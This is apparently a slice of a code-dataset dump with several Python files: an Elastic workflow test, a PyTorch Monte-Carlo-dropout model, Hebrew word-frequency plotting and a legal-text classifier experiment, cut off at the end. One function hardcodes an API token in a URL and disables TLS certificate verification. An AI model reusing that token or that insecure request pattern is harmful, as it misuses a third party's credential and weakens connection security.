\"oaebu-unmatched-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_unmatched_book_metrics\",\n render_template(\n os.path.join(path, \"oaebu-unmatched-metrics-mappings.json.jinja2\"),\n aggregation_level=aggregate_level,\n ),\n ),\n (\n \"oaebu_anu_press_institution_list\",\n render_template(os.path.join(path, \"oaebu-institution-list-mappings.json.jinja2\")),\n ),\n ]\n\n for table_id, expected_mappings_str in expected:\n print(table_id)\n expected_mappings = json.loads(expected_mappings_str)\n actual_mappings = load_elastic_mappings_oaebu(path, table_id)\n self.assertEqual(expected_mappings, actual_mappings)\n\n def test_dag_load(self):\n \"\"\"Test that the DAG can be loaded from a DAG bag.\n\n :return: None\n \"\"\"\n\n env = ObservatoryEnvironment(self.project_id, self.data_location, enable_api=False)\n with env.create():\n expected_dag_ids = [\n make_dag_id(\"elastic_import\", suffix)\n for suffix in [\"anu_press\", \"ucl_press\", \"wits_university_press\", \"university_of_michigan_press\"]\n ]\n\n dag_file = os.path.join(module_file_path(\"oaebu_workflows.dags\"), \"elastic_import_workflow.py\")\n for dag_id in expected_dag_ids:\n self.assert_dag_load(dag_id, dag_file)\n","sub_path":"oaebu_workflows/workflows/tests/test_elastic_workflow.py","file_name":"test_elastic_workflow.py","file_ext":"py","file_size_in_byte":7163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"568935389","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom model import common\n\n\ndef make_model(args):\n return EPISTEMIC(args)\n\n\nclass EPISTEMIC(nn.Module):\n def __init__(self, config):\n super(EPISTEMIC, self).__init__()\n self.drop_rate = config.drop_rate\n in_channels = config.in_channels\n filter_config = (64, 128)\n\n self.encoders = nn.ModuleList()\n self.decoders = nn.ModuleList()\n\n # setup number of conv-bn-relu blocks per module and number of filters\n encoder_n_layers = (2, 2, 3, 3, 3)\n encoder_filter_config = (in_channels,) + filter_config\n decoder_n_layers = (3, 3, 3, 2, 1)\n decoder_filter_config = filter_config[::-1] + (filter_config[0],)\n\n for i in range(0, 2):\n # encoder architecture\n self.encoders.append(_Encoder(encoder_filter_config[i],\n encoder_filter_config[i + 1],\n encoder_n_layers[i]))\n\n # decoder architecture\n self.decoders.append(_Decoder(decoder_filter_config[i],\n decoder_filter_config[i + 1],\n decoder_n_layers[i]))\n\n # final classifier (equivalent to a fully connected layer)\n self.classifier = nn.Conv2d(filter_config[0], in_channels, 3, 1, 1)\n\n def forward(self, x):\n indices = []\n unpool_sizes = []\n feat = x\n\n # encoder path, keep track of pooling indices and features size\n for i in range(0, 2):\n (feat, ind), size = self.encoders[i](feat)\n if i == 1:\n feat = F.dropout(feat, p=self.drop_rate, training=True)\n indices.append(ind)\n unpool_sizes.append(size)\n\n # decoder path, upsampling with corresponding indices and size\n for i in range(0, 2):\n feat = self.decoders[i](feat, indices[1 - i], unpool_sizes[1 - i])\n if i == 0:\n feat = F.dropout(feat, p=self.drop_rate, training=True)\n\n output = self.classifier(feat)\n results = {'mean': output}\n\n return results\n\n\nclass _Encoder(nn.Module):\n def __init__(self, n_in_feat, n_out_feat, n_blocks=2):\n \"\"\"Encoder layer follows VGG rules + keeps pooling indices\n Args:\n n_in_feat (int): number of input features\n n_out_feat (int): number of output features\n n_blocks 
(int): number of conv-batch-relu block inside the encoder\n drop_rate (float): dropout rate to use\n \"\"\"\n super(_Encoder, self).__init__()\n\n layers = [nn.Conv2d(n_in_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n if n_blocks > 1:\n layers += [nn.Conv2d(n_out_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n self.features = nn.Sequential(*layers)\n\n def forward(self, x):\n output = self.features(x)\n return F.max_pool2d(output, 2, 2, return_indices=True), output.size()\n\n\nclass _Decoder(nn.Module):\n \"\"\"Decoder layer decodes the features by unpooling with respect to\n the pooling indices of the corresponding decoder part.\n Args:\n n_in_feat (int): number of input features\n n_out_feat (int): number of output features\n n_blocks (int): number of conv-batch-relu block inside the decoder\n drop_rate (float): dropout rate to use\n \"\"\"\n\n def __init__(self, n_in_feat, n_out_feat, n_blocks=2):\n super(_Decoder, self).__init__()\n\n layers = [nn.Conv2d(n_in_feat, n_in_feat, 3, 1, 1),\n nn.BatchNorm2d(n_in_feat),\n nn.ReLU()]\n\n if n_blocks > 1:\n layers += [nn.Conv2d(n_in_feat, n_out_feat, 3, 1, 1),\n nn.BatchNorm2d(n_out_feat),\n nn.ReLU()]\n\n self.features = nn.Sequential(*layers)\n\n def forward(self, x, indices, size):\n unpooled = F.max_unpool2d(x, indices, 2, 2, 0, size)\n return self.features(unpooled)\n","sub_path":"MCBN_src/model/epistemic.py","file_name":"epistemic.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"50149439","text":"import matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\nimport requests\nfrom time import sleep\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef split_by_whitespace(data):\n \"\"\"\n this function split the data by whitespace\n \"\"\"\n return data.split()\n\n\ndef count_word_number(text):\n \"\"\"\n this function return the number of words in the data\n \"\"\"\n return len(split_by_whitespace(text))\n\n\ndef plot_word_number_histogram(data):\n \"\"\"\n this function plot a histogram of the number of words in the data\n \"\"\"\n hist = dict()\n for idx, row in data.iterrows():\n cur_len = str(count_word_number(row['text']))\n if cur_len in hist.keys():\n hist[cur_len] += 1\n else:\n hist[cur_len] = 1\n new_hist = dict(sorted(hist.items(), key = lambda x:x[0]))\n plt.bar(new_hist.keys(), new_hist.values())\n plt.title(\"Word Number Histogram\")\n plt.xlabel(\"words\")\n plt.ylabel(\"frequancy\")\n plt.show()\n\n\ndef plot_top_20_common_words(data, file_name):\n \"\"\"\n this function plot the top 20 common words in the data\n \"\"\"\n general_counter = Counter()\n for idx, row in data.iterrows():\n general_counter += Counter(split_by_whitespace(row['text']))\n most = general_counter.most_common(20)\n x, y = [], []\n for word, count in most:\n x.append(word)\n y.append(count)\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top commom words\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef plot_top_20_bigrams_words(data, file_name):\n \"\"\"\n This function plot the 20 common bigrams in the data\n \"\"\"\n vec = CountVectorizer(ngram_range = (2,2))\n bow = vec.fit_transform(list(data['text']))\n sum_words = bow.sum(axis=0)\n words_freq = [(word, sum_words[0, idx]) for word, idx in 
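# A minimal sketch, not part of the original epistemic.py: because forward()
# above applies F.dropout(..., training=True), dropout stays active at
# inference, which is exactly what Monte-Carlo epistemic-uncertainty
# estimation needs -- repeated forward passes differ, and their spread
# estimates the model uncertainty. "config" below is a hypothetical stand-in
# for the object make_model() expects.
import types
import torch

config = types.SimpleNamespace(drop_rate=0.5, in_channels=3)
model = EPISTEMIC(config)              # class defined above
model.eval()

x = torch.randn(1, 3, 64, 64)          # H and W divisible by 4 for the pools
with torch.no_grad():
    samples = torch.stack([model(x)["mean"] for _ in range(20)])

mean = samples.mean(dim=0)             # MC estimate of the prediction
std = samples.std(dim=0)               # per-pixel epistemic uncertainty
print(mean.shape, std.shape)           # torch.Size([1, 3, 64, 64]) twice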
vec.vocabulary_.items()]\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)[:20]\n x, y = map(list, zip(*words_freq))\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top Bigrams Barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef invert_words(words):\n \"\"\"\n this function invert every word from the given list\n \"\"\"\n return [w[::-1] for w in words]\n\n\ndef plot_top_non_stop_words_barchart(data, file_name):\n \"\"\"\n this function plot toe non stop words barchart\n \"\"\"\n stop = get_hebrew_stop_words()\n general_counter = Counter()\n for idx, row in data.iterrows():\n non_stop_words_text = [word for word in row['text'].split() if word not in stop]\n general_counter += Counter(non_stop_words_text)\n most = general_counter.most_common(20)\n x, y = [], []\n for word, count in most:\n x.append(word)\n y.append(count)\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top Non-Stopwords Barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef get_hebrew_stop_words():\n \"\"\"\n this function return the hebrew stop words\n \"\"\"\n stop_words = \"heb_stopwords.txt\"\n with open(stop_words, encoding=\"utf-8\") as in_file:\n lines = in_file.readlines()\n res = [l.strip() for l in lines]\n return res\n\ndef plot_top_bigrams_non_stop_words_barchart(data, file_name):\n \"\"\"\n This function plot the 20 common bigrams non stop words\n \"\"\"\n vec = CountVectorizer(ngram_range = (2,2))\n bow = vec.fit_transform(list(data['text']))\n sum_words = bow.sum(axis=0)\n stop = get_hebrew_stop_words()\n words_freq = []\n for word, idx in vec.vocabulary_.items():\n flag = False\n for w in word.split():\n if w in stop:\n flag = True\n if not flag:\n words_freq.append((word, sum_words[0, idx]))\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)[:20]\n x, y = map(list, zip(*words_freq))\n fig = sns.barplot(x=y, y=invert_words(x))\n plt.title(\"Top bigrams non stop barchart\")\n plt.ylabel(\"words\")\n plt.xlabel(\"frequancy\")\n plt.show()\n plt.savefig(\"statistic/\" + file_name + \".png\")\n\n\ndef get_yap_analysis(text):\n \"\"\"\n this function return yap analysis\n \"\"\"\n text = text.replace(r'\"', r'\\\"')\n url = f'https://www.langndata.com/api/heb_parser?token=a70b54d01ef5e9c055ab9051b9deafee'\n _json = '{\"data\":\"' + text.strip() + '\"}'\n sleep(3)\n r = requests.post(url, data=_json.encode('utf-8'), headers={'Content-type': 'application/json; charset=utf-8'},\n verify=False)\n json_obj = r.json()\n md_lattice = json_obj[\"md_lattice\"]\n res_df = pd.io.json.json_normalize([md_lattice[i] for i in md_lattice.keys()])\n print(res_df)\n return res_df\n\n\ndef get_text_statistics(text, text_name):\n \"\"\"\n this function return the text statistics\n \"\"\"\n plot_top_20_common_words(text, \"commonWords_\" + text_name)\n plot_top_non_stop_words_barchart(text, \"commonNonStopwords_\" + text_name)\n plot_top_20_bigrams_words(text, \"commonBigrams_\" + text_name)\n plot_top_bigrams_non_stop_words_barchart(text, \"commonBigramsNonStopwords_\" + text_name)\n\n","sub_path":"text_statistics.py","file_name":"text_statistics.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"480083347","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 28 14:24:33 2019\r\n\r\n@author: 
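# A minimal sketch, not part of the original text_statistics.py:
# get_yap_analysis() above builds its dataframe with pd.io.json.json_normalize,
# which pandas deprecated in 1.0; the supported spelling is pd.json_normalize
# and it accepts the same list-of-dicts input:
import pandas as pd

md_lattice = {"1": {"word": "shalom", "pos": "NN"},
              "2": {"word": "olam", "pos": "NN"}}   # toy stand-in for the API reply
res_df = pd.json_normalize([md_lattice[i] for i in md_lattice.keys()])
print(res_df)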
mxc18bsu\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction import text \r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.dummy import DummyClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\nimport scipy.stats as stats\r\nfrom sklearn import metrics\r\nfrom sklearn.linear_model import Perceptron\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nmy_additional_stop_words = [\"allow\",\"allowed\",\"dismiss\",\"dismissed\"]\r\nstop_words = text.ENGLISH_STOP_WORDS.union(my_additional_stop_words)\r\n\r\n\r\n\r\n\r\n####################### load in data\r\nos.chdir('U:\\Documents\\PyProjects\\dissertation\\\\texts')\r\ntotal1 = pd.read_pickle(\"Text_Documents_unbalanced_PP2\")\r\ntotal2 = total1.loc[total1['Label'].isin(['Against','For'])]\r\nX = total2['modText1'].values\r\ny = total2['Label'].values\r\nEncoder = LabelEncoder()\r\ny = Encoder.fit_transform(y)\r\n#list(Encoder.inverse_transform([0,1,2]))\r\n#remove 20% for validation set to be used for parameter tuning\r\n#remaining 80% to be used in CV\r\nX, X_val, y, y_val = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\n###scoring function\r\n\r\ndef scorer(classifier,features,y_input):\r\n kf = KFold(n_splits=5)\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='accuracy')\r\n print(sum(cv_scores)/len(cv_scores))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='f1_macro')\r\n print(\"f1_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='precision_macro')\r\n print(\"precision_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='recall_macro')\r\n print(\"recall_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n\r\n\r\n### Dummy classifier\r\n\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,6),\r\n min_df=1)\r\nfeatures_count = cv.fit_transform(X)\r\ndummy = DummyClassifier(strategy=\"uniform\")\r\nscorer(dummy,features_count,y)\r\n\r\n\r\n\r\n### classifiers\r\n\r\n#count features\r\ndef tfidfvector1():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n svclassifier = SVC(kernel='linear') \r\n \r\n scorer(svclassifier,features_count,y)\r\n \r\n\r\ndef tfidfvector2():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n rf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n \r\n 
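# A minimal sketch, not part of the original models_ml_ngrams.py: scorer()
# above runs cross_val_score four separate times, refitting the classifier
# once per metric. sklearn's cross_validate evaluates several scorers in a
# single CV pass:
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import KFold, cross_validate

X_demo = np.random.rand(100, 5)          # toy stand-ins for the TFIDF data
y_demo = np.random.randint(0, 2, 100)

metrics_list = ["accuracy", "f1_macro", "precision_macro", "recall_macro"]
scores = cross_validate(LogisticRegression(), X_demo, y_demo,
                        cv=KFold(n_splits=5), scoring=metrics_list)
for name in metrics_list:
    print(name, scores["test_" + name].mean())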
scorer(rf,features_count,y)\r\n\r\n \r\ndef tfidfvector3():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n lr = LogisticRegression()\r\n \r\n scorer(lr,features_count,y)\r\n \r\n \r\ndef tfidfvector4():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n knc = KNeighborsClassifier(n_neighbors=5)\r\n \r\n scorer(knc,features_count,y) \r\n\r\ndef tfidfvector5():\r\n #for i in [200,500,800,1000,2000,3000,4000,5000,6000,7000,8000,10000]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,4),\r\n min_df=3)\r\n features_count = cv.fit_transform(X)\r\n \r\n slp = Perceptron(tol=1e-3, random_state=0)\r\n \r\n scorer(slp,features_count,y) \r\n\r\ndef tfidfvector6():\r\n #for i in [1,2,3,4,5,6]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,2),\r\n min_df=1)\r\n features_count = cv.fit_transform(X)\r\n \r\n mlp = MLPClassifier(solver='lbfgs',activation='relu', alpha=1e-5, hidden_layer_sizes=(2,2), random_state=1)\r\n \r\n scorer(mlp,features_count,y) \r\n\r\nprint(\"SVM\")\r\ntfidfvector1()\r\nprint(\"RF\")\r\ntfidfvector2()\r\nprint(\"LR\")\r\ntfidfvector3()\r\nprint(\"k-NN\")\r\ntfidfvector4()\r\nprint(\"slp\")\r\ntfidfvector5()\r\nprint(\"mlp\")\r\ntfidfvector6()\r\n\r\n\r\n\r\n\r\n############## model confidence plot\r\n\r\nX, X_test, y, y_test = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,4),\r\n min_df=1)\r\nfeatures_count = cv.fit_transform(X)\r\n\r\nrf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\nclassifier = rf.fit(features_count,y)\r\n\r\nX_predictions = cv.transform(X_test)\r\npredictions = classifier.predict_proba(X_predictions) \r\n\r\n#labels = ['Against', 'For', 'Split']\r\n\r\ny_test_l = []\r\ny_test_l = list(y_test)\r\n\r\ndataset = pd.DataFrame({'Label':y_test_l,'Label 0 (Against)':predictions[:,0],'Label 1 (for)':predictions[:,1]})\r\ndataset.sort_values(by=['Label'])\r\n\r\n\r\n\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.scatter(dataset['Label'],dataset['Label 0 (Against)'], color='g',label='Label 0 (against)',alpha=0.3)\r\nplt.scatter(dataset['Label'],dataset['Label 1 (for)'], color='r',label='label 1 (for)',alpha=0.3)\r\nplt.ylabel('Confidence')\r\nplt.xlabel('Accuracy')\r\nplt.title('Scatterplot of Confidence by Category')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nfig.savefig('model_confidence',dpi=300)\r\n\r\n\r\nplt.xticks(4, labels, size='small')\r\n\r\n\r\n\r\n\r\n#################################\r\n#statistical test for model confidence\r\ndataset0 = dataset[dataset['Label']==0]\r\ndataset1 = dataset[dataset['Label']==1]\r\ndataset2 = dataset[dataset['Label']==2]\r\n\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset0.iloc[:,1], dataset0.iloc[:,2], 
equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset0.iloc[:,1].mean()-dataset0.iloc[:,2].mean())\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset1.iloc[:,1], dataset1.iloc[:,2], equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset1.iloc[:,1].mean()-dataset1.iloc[:,2].mean())\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset2.iloc[:,1], dataset2.iloc[:,2], equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset2.iloc[:,1].mean()-dataset2.iloc[:,2].mean())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n##################plot max_feature size accuracy by model\r\n#number of features results\r\nsvmlist = [0.5745954962468722,0.5618682235195998,0.5683069224353628,0.5719266055045872,0.5554545454545454,0.5628023352793995,0.558256880733945,0.5646455379482902,0.5692160133444537,0.5737781484570474,0.5765221017514596,0.5755879899916596]\r\nrflist = [0.6121100917431193,0.6039199332777315,0.6532944120100084,0.6450458715596331,0.6568890742285237,0.6569224353628023,0.6606005004170142,0.6742201834862386,0.6642201834862386,0.6861801501251042,0.688023352793995,0.709933277731443]\r\nlrlist = [0.5883319432860717,0.5682902418682236,0.5700834028356965,0.5792243536280234,0.5746955796497082,0.5802001668056713,0.5756380316930776,0.5765721434528774,0.5820266889074228,0.588465387823186,0.5929941618015013,0.5865721434528774]\r\nknclist = [0.5252210175145955,0.5262218515429524,0.5160550458715597,0.5315763135946623,0.5480900750625521,0.5480316930775647,0.5435029190992494,0.5480567139282736,0.5407673060884071,0.5444286905754796,0.5288490408673895,0.5562885738115096]\r\nslp = [0.5361861982299938,0.5647629742520254,0.5339696799550815,0.5200903719151895,0.534001764658699,0.54870190636614,0.5325472580947033,0.5325472580947034,0.547159166867196,0.5610866019625144,0.5398385069917917,0.5574235982995107]\r\nmlp = [0.45572310900778057,0.45572310900778057,0.5435202267319056,0.5340178070105077,0.5376647683217026,0.45572310900778057,0.5596214004973129,0.5325285420175931,0.45572310900778057,0.5479131574022085,0.45572310900778057,0.5632630143579049]\r\n#ngram results\r\nsvmlist = [0.5562135112593828,0.5644370308590492,0.5854795663052543,0.5918849040867389,0.5909591326105088,0.5918598832360301]\r\nrflist = [0.6019849874895746,0.6330859049207673,0.6458632193494578,0.6787739783152628,0.6604503753127606,0.665095913261051]\r\nlrlist = [0.5653294412010009,0.5699165971643035,0.5808924103419516,0.5790575479566304,0.5827272727272728,0.5809090909090908]\r\nknclist = [0.5204503753127606,0.5323603002502085,0.5205838198498749,0.5314595496246872,0.5360967472894079,0.532418682235196]\r\nslp = [0.5479211785781128,0.5164701478570092,0.5178818748161814,0.5413277719847063,0.5501216545012165,0.5493409267131895]\r\nmlp = [0.542060372717307,0.5728001925082217,0.46667201411726955,0.5640089837170128,0.45572310900778057,0.55633347897441]\r\n\r\n#min occurences results\r\nsvmlist = [0.5854795663052543,0.5790408673894912,0.5699082568807341,0.5717347789824854]\r\nrflist = [0.6111592994161802,0.6486321934945789,0.6458632193494578,0.6687823185988323]\r\nlrlist = [0.5808924103419516,0.5781484570475396,0.577256046705588,0.5735863219349457]\r\nknclist = [0.5205838198498749,0.5342118432026689,0.5387989991659716,0.535187656380317]\r\nslp = [0.5178818748161814,0.5201010668163952,0.5537846581642202,0.5427902997246064]\r\nmlp = [0.5640089837170128,0.45572310900778057,0.5559610705596107,0.45572310900778057]\r\n\r\n#### \r\nx=[200,500,800,1000,2000,3000,4000,5000,6000,7000,8000,10000]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random 
Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy')\r\nplt.xlabel('Maximum Model Features')\r\nplt.title('Plot of model accuracy against maximum number of features')\r\nplt.legend(loc='upper right')\r\nplt.show()\r\nfig.savefig('accuracy_features',dpi=300)\r\n\r\nx=[1,2,3,4,5,6]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy %')\r\nplt.xlabel('Maximum n')\r\nplt.title('Plot of model accuracy against maximum n-gram value')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\nfig.savefig('accuracy_n',dpi=300)\r\n\r\nx=[1,2,3,4]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy %')\r\nplt.xlabel('Minimum Occurence')\r\naxes= plt.axes()\r\naxes.set_xticks([1,2,3,4])\r\nplt.title('Plot of model accuracy against minimum number of feature occurrences')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\nfig.savefig('accuracy_occurences',dpi=300)\r\n\r\n\r\n##########roc curves\r\n# roc curve and auc\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\nimport sklearn.metrics as metrics\r\nfrom sklearn import svm, datasets\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom scipy import interp\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n\r\n\r\nX, X_test, y, y_test = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\n####\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nclf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(features_count, y)\r\npredictions = classifier.predict_proba(features_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_TFIDF, tpr_TFIDF, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_TFIDF = metrics.auc(fpr_TFIDF, tpr_TFIDF)\r\n####\r\ncv = CountVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nclf = 
RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(features_count, y)\r\npredictions = classifier.predict_proba(features_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_COUNT, tpr_COUNT, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_COUNT = metrics.auc(fpr_COUNT, tpr_COUNT)\r\n####\r\ncv = CountVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nno_topics = 35\r\nlda_count = LatentDirichletAllocation(n_components=no_topics, max_iter=5, \r\n learning_method='online', learning_offset=50.,\r\n random_state=0).fit_transform(features_count)\r\nlda_test = LatentDirichletAllocation(n_components=no_topics, max_iter=5, \r\n learning_method='online', learning_offset=50.,\r\n random_state=0).fit_transform(features_test)\r\n\r\nclf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(lda_count, y)\r\npredictions = classifier.predict_proba(lda_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_LDA, tpr_LDA, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_LDA = metrics.auc(fpr_LDA, tpr_LDA)\r\n######\r\n\r\n\r\n\r\n#######\r\n\r\nfig = plt.figure()\r\n\r\nplt.subplot(2, 2, 1)\r\nplt.title('Count Vectors - RF')\r\nplt.plot(fpr_COUNT, tpr_COUNT, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_COUNT,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 2)\r\nplt.title('TFIDF Vectors - RF')\r\nplt.plot(fpr_TFIDF, tpr_TFIDF, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_TFIDF,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 3)\r\nplt.title('Clusters - RF')\r\nplt.plot(fpr_LDA, tpr_LDA, color='darkturquoise', label = 'AUC 